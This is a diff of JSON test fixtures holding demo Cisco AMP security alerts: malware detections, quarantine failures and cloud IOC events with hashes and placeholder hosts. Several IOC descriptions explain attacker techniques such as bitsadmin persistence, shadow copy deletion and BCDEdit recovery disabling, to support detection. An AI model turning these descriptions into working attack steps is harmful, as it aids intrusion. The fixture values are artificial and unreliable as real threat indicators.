"related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6533241145273614337", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 525000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241145273614000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 5008, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Overdrive.RET", + "cisco.amp.detection_id": "6533241145273614338", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 619000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241145273614000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "0fe5be3811a98ee6a9c997d3812d911a", + "file.hash.sha1": "cf162622e29bca072d01b274fbbc3ceaacdd13c7", + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "file.name": "SqGGuYXyy.exe", + "file.path": "\\\\?\\C:\\SqGGuYXyy.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 6204, + "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866", + "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", + "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", + "process.name": "svchost.exe", + "process.pid": 896, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "0fe5be3811a98ee6a9c997d3812d911a", + "cf162622e29bca072d01b274fbbc3ceaacdd13c7" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:50.000Z", + "cisco.amp.cloud_ioc.description": "The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.", + "cisco.amp.cloud_ioc.short_description": "W32.WScriptExecuteFakeExtension.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 875739000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521138739875754000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:05:50.000Z", + "file.hash.sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0", + "file.name": "WScript.exe", + "file.path": "/C:/Windows/System32/WScript.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 10424, + "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", + "related.hash": [ + "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:50.000Z", + "cisco.amp.cloud_ioc.description": "Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.", + "cisco.amp.cloud_ioc.short_description": "W32.Bitsadmin.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 868146000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521138739868158500, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:05:50.000Z", + "file.hash.sha256": "838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00", + "file.name": "bitsadmin.exe", + "file.path": "/C:/Windows/System32/bitsadmin.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 12096, + "process.hash.sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0", + "related.hash": [ + "838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:50.000Z", + "cisco.amp.cloud_ioc.description": "Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.", + "cisco.amp.cloud_ioc.short_description": "W32.WScriptLaunchedZippedJS.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 846943000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521138739846959000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:05:50.000Z", + "file.hash.sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0", + "file.name": "WScript.exe", + "file.path": "/C:/Windows/System32/WScript.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 14294, + "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", + "related.hash": [ + "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:04:56.000Z", + "cisco.amp.cloud_ioc.description": "Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.", + "cisco.amp.cloud_ioc.short_description": "W32.PossibleRansomwareShadowCopyDeletion.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 48000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1494576726048000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:04:56.000Z", + "file.hash.sha256": "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10", + "file.name": "vssadmin.exe", + "file.path": "/C:/windows/system32/vssadmin.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 16006, + "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "related.hash": [ + "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:04:49.000Z", + "cisco.amp.cloud_ioc.description": "The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.", + "cisco.amp.cloud_ioc.short_description": "W32.BCDEditDisableRecovery.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 672000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1494576727672000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2021-01-14T10:04:49.000Z", + "file.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "file.name": "cmd.exe", + "file.path": "/C:/windows/system32/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 17775, + "process.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "related.hash": [ + "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:03:40.000Z", + "cisco.amp.cloud_ioc.description": "A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.", + "cisco.amp.cloud_ioc.short_description": "W32.FakeExtensionExec.RET", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 791000000, + "event.action": "Cloud IOC", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1458617561791000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:03:40.000Z", + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "file.path": "/c:/users/rsteadman/downloads/report.pdf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "input.type": "log", + "log.offset": 19558, + "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8", + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:01:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "be:b0:d5:89:e2:96" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6880587034675642558", + "cisco.amp.error.description": "Object path not found", + "cisco.amp.error.error_code": 3221225530, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Unknown", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "be:b0:d5:89:e2:96" + ], + "cisco.amp.timestamp_nanoseconds": 396000000, + "event.action": "Quarantine Failure", + "event.dataset": "cisco.amp", + "event.id": 6880587034675643000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e", + "fileset.name": "amp", + "host.hostname": "Demo_BP_WMIPRVSE", + "host.name": "Demo_BP_WMIPRVSE", + "input.type": "log", + "log.offset": 21167, + "related.hash": [ + "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" + ], + "related.hosts": [ + "Demo_BP_WMIPRVSE" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:01:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "be:b0:d5:89:e2:96" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Generic.Malware.WX.9E93D282", + "cisco.amp.detection_id": "6880587021790740668", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Unknown", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "be:b0:d5:89:e2:96" + ], + "cisco.amp.timestamp_nanoseconds": 737000000, + "event.action": "Threat Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 6880587030380676000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48", + "file.name": "p3fci4nu.dll", + "file.path": "\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll", + "fileset.name": "amp", + "host.hostname": "Demo_BP_WMIPRVSE", + "host.name": "Demo_BP_WMIPRVSE", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 27082, + "process.hash.md5": "23ee3d381cfe3b9f6229483e2ce2f9e1", + "process.hash.sha1": "93cf877f5627e55ec076a656e935042fac39950e", + "process.hash.sha256": "4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57", + "process.name": "csc.exe", + "process.pid": 6708, + "related.hash": [ + "1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48" + ], + "related.hosts": [ + "Demo_BP_WMIPRVSE" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T09:56:55.000Z", + "cisco.amp.cloud_ioc.description": "The psexec utility was executed as admin.", + "cisco.amp.cloud_ioc.short_description": "W32.PsexecAsAdmin.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 615000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 460392585524661250, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T09:56:55.000Z", + "file.hash.sha256": "3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef", + "file.name": "PsExec.exe", + "file.path": "file:///C%3A/share%24/PsExec.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 28604, + "process.hash.sha256": "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386", + "related.hash": [ + "3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T07:56:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648173, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 758406329, + "event.action": "File Fetch Completed", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508191586038317000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "file.hash.md5": "41476df3138717868118d8542cf3d1d6", + "file.hash.sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b", + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 30050, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "41476df3138717868118d8542cf3d1d6", + "5ca4bef8de6def53519d4b22632675bb4c1e470b" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T05:49:06.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellEncodedBuffer.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 403000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 7007136035192884000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T05:49:06.000Z", + "file.hash.sha256": "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8", + "file.name": "powershell.exe", + "file.path": "file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 31276, + "process.hash.sha256": "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8", + "related.hash": [ + "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T00:37:44.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296278, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "event.action": "Threat Detected in Low Prevalence Executable", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1515350231459808800, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 33023, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T00:27:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648173, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 579890366, + "event.action": "File Fetch Completed", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508191586038317000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "file.hash.md5": "41476df3138717868118d8542cf3d1d6", + "file.hash.sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b", + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 34132, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "41476df3138717868118d8542cf3d1d6", + "5ca4bef8de6def53519d4b22632675bb4c1e470b" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T00:02:08.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 614000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6583671182384431000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 35358, + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": 